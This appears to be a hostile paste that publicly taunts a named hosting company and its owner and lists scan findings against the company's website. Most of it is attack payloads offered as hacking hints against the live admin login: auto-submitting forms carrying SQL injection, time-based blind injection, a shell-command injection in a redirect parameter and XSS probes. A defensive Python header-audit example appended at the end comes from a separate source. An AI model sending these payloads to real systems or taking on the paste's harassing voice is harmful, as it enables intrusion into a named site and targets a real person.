
Scott ownage #1

  1. This won't disclose the biggest vulnerabilities of the website, considering I don't want to expose the deepest gaping holes.
  2. I want to expose him for not being a hacker.
  3.  
  4.  
  5. https://soundcloud.com/thothey/dr-raid-nice-report
  6. dedicated to BlazingNode Owner Scott Wiwek.
  7. You shouldn't have messed with my boy Chrono - the Infamous ILlKiD Atmos The Wicked
  8. Got to be to the day that i Die #DG4E
  9. If you do argue after i will be fuzzing your shit, then abuse of burp, REST,recon,fuzzer http view list goes on , bitch we toolin' up and write our own sadkunt shout out to PP4L, Digital Gangster and thugCrowd.
  10.  
  11.  
  12.  
  13.  
  14. Web Server Disclosure
  15. banner
  16. server: Apache
  17. host
  18. blazingnode.org
  19. banner
  20. x-powered-by: PHP/7.0.32
  21. host
  22. blazingnode.org
  23.  
  24. Did you really think hiding your poor code and premade template behind Cloudflare would stop any real hackers?
  25. It's just a matter of time before someone finds a bypass. Ahhh poor little boy, security is an illusion on this Inet.
  26. Gotta be on point with that bitness fitness.
  27.  
  28.  
  29. X-Frame Option not used
  30. Can't set up proper headers, that sucks. Ahhh, didn't learn how to properly set up a web server...
  31. http://en.wikipedia.org/wiki/X-FRAME-OPTIONS#Frame-Options
  32. http://en.wikipedia.org/wiki/Clickjacking
  33. These are just the more known vulnerabilities that can happen; dig a bit and you will find much more.
  34. about X-frame
  35. uri
  36. https://blazingnode.org/
  37. email
  38. sales@blazingnode.org
  39.  
  40. GET https://blazingnode.org/ HTTP/1.1
  41. Damn this fool not even on http2. As a provider you should be up to date with latest technology.
  42.  
  43.  
  44. Admin page discovery
  45. uri
  46. https://blazingnode.org/admin/login.php?redirect=%2Fadmin%2F
  47. What the actual fuck, why is this not behind any kind of WAF, SSL gateway, etc.
  48. Such a page should always be behind additional security layers and only allow connections from specific VPN IPs you set up for the company in question.
  49.  
  50. Path disclosures
  51. He didn't even learn about HTTP status codes and how they can reveal server path information...
  52. Ahhh those pseudo hackers that pretend that they know something...
  53. I bet he doesn't even know the OSI layers.
  54.  
  55. AutoComplete Enabled
  56. uri
  57. https://blazingnode.org/admin/login.php?redirect=%2Fadmin%2F
  58.  
  59. <form method="post" action="/admin/dologin.php">
  60. <form method="post" class="using-password-strength" action="/register.php" role="form" name="orderfrm" id="frmCheckout">
  61. <form role="form" method="post" action="/index.php?rp=/knowledgebase/search">
  62. <form method="post" action="contact.php" class="form-horizontal" role="form">
  63. <form method="post" action="https://blazingnode.org/pwreset.php" role="form">
  64. uri
  65. https://cp.blazingnode.org:4085/index.php?act=login&redirect=%2F
  66.  
  67. <form accept-charset="UTF-8" action="" method="post" name="loginform" class="form-horizontal">
  68.  
  69. uri
  70. https://blazingnode.org/admin/login.php?action=reset
  71.  
  72. <form action="/admin/login.php" method="post" id="frmResetPassword">
  73.  
  74.  
  75. Well, I would like to thank you for allowing us to easily grab credentials.
  76. It makes the job much easier this way.
  77.  
  78. The game is either to be sold or taught. So I won't post the best vulnerabilities or paths.
  79. But I'm nice enough to give a list of little hints to proceed with successful hacking of blazingnode
  80.  
  81. <img src="https://blazingnode.org/admin/login.php?redirect=http%3A%2F%2F9peQR"/>
  82.  
  83. <img src="https://blazingnode.org/admin/login.php?redirect=%22%7Cecho%20%27w%27%273%27%27A%27%27n%27%273%27%20%7C%22"/>
  84.  
  85. <form method="POST" action="https://blazingnode.org/admin/dologin.php">
  86. <input type="hidden" name="username" value="zliy8"/>
  87. <input type="hidden" name="password" value="H2EwgGRxZB"/>
  88. <input type="hidden" name="token" value="6dba90d19c54f28e48ac0bcbc035889ce1a68660"/>
  89. <input type="hidden" name="language" value=""/>
  90. <input type="hidden" name="redirect" value="/admin/"/>
  91. <input type="hidden" name="rememberme" value="1"/>
  92. </form>
  93. <script>document.forms[0].submit()</script>
  94.  
  95. <form method="POST" action="https://blazingnode.org/admin/dologin.php">
  96. <input type="hidden" name="username" value="kAIn2"/>
  97. <input type="hidden" name="password" value="4qKYZGRxZB"/>
  98. <input type="hidden" name="token" value="56dac0ee78af252b371e64febd457a51b2386128"/>
  99. <input type="hidden" name="language" value=""/>
  100. <input type="hidden" name="redirect" value="&amp;#039;&amp;gt;&amp;lt;sftPM&amp;gt;"/>
  101. <input type="hidden" name="rememberme" value="1"/>
  102. </form>
  103. <script>document.forms[0].submit()</script>
  104. <form method="POST" action="https://blazingnode.org/admin/dologin.php">
  105. <input type="hidden" name="username" value="KyVph"/>
  106. <input type="hidden" name="password" value="sVp4RGRxZB"/>
  107. <input type="hidden" name="token" value="66c71005b612923975c3df9d3ffea58ebd0d7392"/>
  108. <input type="hidden" name="language" value=""/>
  109. <input type="hidden" name="redirect" value="&amp;quot;&amp;gt;&amp;lt;sftPM&amp;gt;"/>
  110. <input type="hidden" name="rememberme" value="1"/>
  111. </form>
  112. <script>document.forms[0].submit()</script>
  113. <form method="POST" action="https://blazingnode.org/admin/dologin.php">
  114. <input type="hidden" name="username" value="&quot;>&lt;vSrUv>"/>
  115. <input type="hidden" name="password" value="H2EwgGRxZB"/>
  116. <input type="hidden" name="token" value="6dba90d19c54f28e48ac0bcbc035889ce1a68660"/>
  117. <input type="hidden" name="language" value=""/>
  118. <input type="hidden" name="redirect" value="/admin/"/>
  119. <input type="hidden" name="rememberme" value="1"/>
  120. </form>
  121. <script>document.forms[0].submit()</script>
  122. <form method="POST" action="https://blazingnode.org/admin/dologin.php">
  123. <input type="hidden" name="username" value="zliy8"/>
  124. <input type="hidden" name="password" value="SELECT CONCAT(0x66,0x47,0x6b,0x4f,0x4e)#"/>
  125. <input type="hidden" name="token" value="6dba90d19c54f28e48ac0bcbc035889ce1a68660"/>
  126. <input type="hidden" name="language" value=""/>
  127. <input type="hidden" name="redirect" value="/admin/"/>
  128. <input type="hidden" name="rememberme" value="1"/>
  129. </form>
  130. <script>document.forms[0].submit()</script>
  131. <form method="POST" action="https://blazingnode.org/admin/dologin.php">
  132. <input type="hidden" name="username" value="zliy8"/>
  133. <input type="hidden" name="password" value="H2EwgGRxZB"/>
  134. <input type="hidden" name="token" value="&apos; UNION ALL SELECT CONCAT(0x66,0x47,0x6b,0x4f,0x4e),NULL#"/>
  135. <input type="hidden" name="language" value=""/>
  136. <input type="hidden" name="redirect" value="/admin/"/>
  137. <input type="hidden" name="rememberme" value="1"/>
  138. </form>
  139. <script>document.forms[0].submit()</script>
  140.  
  141. <form method="POST" action="https://blazingnode.org/admin/dologin.php">
  142. <input type="hidden" name="username" value="zliy8"/>
  143. <input type="hidden" name="password" value="-1 OR 1=(SELECT 1 FROM (SELECT SLEEP(25))A)"/>
  144. <input type="hidden" name="token" value="6dba90d19c54f28e48ac0bcbc035889ce1a68660"/>
  145. <input type="hidden" name="language" value=""/>
  146. <input type="hidden" name="redirect" value="/admin/"/>
  147. <input type="hidden" name="rememberme" value="1"/>
  148. </form>
  149. <script>document.forms[0].submit()</script>
  150. <?php
  151.  
  152. require_once 'HTTP/Request2.php';
  153.  
  154. $request = new HTTP_Request2("https://blazingnode.org/templates/blazingnode/js/scripts.min.js?v=5d11cc");
  155.  
  156. $request->setAdapter('curl');
  157.  
  158. $request->setMethod("GET");
  159.  
  160. try {
  161. $response = $request->send();
  162. } catch (HTTP_Request2_Exception $e) {
  163. exit('Error: ' . $e->getMessage()); // stop here: $response is undefined when send() throws
  164. }
  165.  
  166. if ($response->getStatus() == 200) {
  167. echo $response->getBody();
  168. } else {
  169. echo 'Unexpected HTTP status: ' . $response->getStatus() . ' ' . $response->getReasonPhrase();
  170. }
  171.  
  172.  
  173.  
  174.  
  175.  
  176.  
  180. rated high on owasp
  181. https://blazingnode.org/admin/login.php?redirect=%2Fadmin%2F
  182. WHMCS
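The banner and framing findings listed near the top of this paste (`server: Apache`, `x-powered-by: PHP/7.0.32`, X-Frame-Options not used) are things a site owner can check in their own responses. The following is an added example, not part of the original paste: a Python audit over constructed sample headers, with hypothetical function names and finding codes.

```python
import re

# Constructed response headers modelled on the two banners quoted in the paste.
SAMPLE_WEAK = {
    "Server": "Apache",
    "X-Powered-By": "PHP/7.0.32",
    "Content-Type": "text/html; charset=utf-8",
}
# Constructed hardened counterpart (values are assumptions, not the site's).
SAMPLE_HARDENED = {
    "Server": "Apache",
    "Content-Type": "text/html; charset=utf-8",
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
}

# Matches product/version tokens such as "PHP/7.0.32" or "Apache/2.4.25".
VERSION_RE = re.compile(r"[A-Za-z][\w.-]*/\d+(\.\d+)*")


def frame_ancestors(csp):
    """Return the frame-ancestors source list from a CSP value, or None."""
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            return parts[1:]
    return None


def audit_headers(headers):
    """Return a sorted list of finding codes for one response's headers."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    findings = []
    # Technology banners: X-Powered-By is never needed; Server should not carry a version.
    if "x-powered-by" in h:
        findings.append("x-powered-by-present")
    for name in ("server", "x-powered-by"):
        if VERSION_RE.search(h.get(name, "")):
            findings.append(f"{name}-discloses-version")
    # Clickjacking protection: a valid X-Frame-Options or a CSP frame-ancestors list.
    xfo = h.get("x-frame-options", "").upper()
    xfo_ok = xfo in ("DENY", "SAMEORIGIN")  # ALLOW-FROM is obsolete and ignored by browsers
    fa = frame_ancestors(h.get("content-security-policy", ""))
    fa_ok = fa is not None and "*" not in fa  # an empty list behaves like 'none'
    if xfo and not xfo_ok:
        findings.append("x-frame-options-invalid")
    if not xfo_ok and not fa_ok:
        findings.append("no-framing-protection")
    return sorted(findings)
```

On Apache with PHP, the findings map to `expose_php = Off` in php.ini, `ServerTokens Prod`, and a `Header always set X-Frame-Options "DENY"` directive (requires mod_headers).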